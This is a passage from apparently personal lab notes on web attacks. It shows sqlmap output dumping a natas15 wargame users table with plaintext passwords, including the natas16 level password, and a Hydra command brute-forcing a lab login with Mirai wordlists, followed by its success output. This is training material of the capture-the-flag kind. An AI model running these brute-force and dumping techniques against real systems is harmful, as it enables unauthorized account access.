| username | password                         |
+----------+----------------------------------+
| bob      | 6P151OntQe                       |
| charlie  | HLwuGKts2w                       |
| alice    | hROtsfM734                       |
| natas16  | WaIHEacj63wnNIBROHeqi3p9t0m5nhmh |
+----------+----------------------------------+

[15:31:01] [INFO] table 'natas15.users' dumped to CSV file '/root/.sqlmap/output/natas15.natas.labs.overthewire.org/dump/natas15/users.csv'
[15:31:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/natas15.natas.labs.overthewire.org'

[*] shutting down at 15:31:01
```
Hydra:

```
hydra -v http-get://10.128.0.5/authentication/example1 -L /usr/share/wordlists/metasploit/mirai_user.txt  -P /usr/share/wordlists/metasploit/mirai_pass.txt
```

output tells us there is one match found:

```
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-27 15:42:46
[DATA] max 16 tasks per 1 server, overall 16 tasks, 645 login tries (l:15/p:43), ~41 tries per task
[DATA] attacking http-get://10.128.0.5:80//authentication/example1
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[80][http-get] host: 10.128.0.5   login: admin   password: admin
[STATUS] attack finished for 10.128.0.5 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
[ERROR] 8 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-11-27 15:42:55
```

# Additional linuxlabs
## wpscan
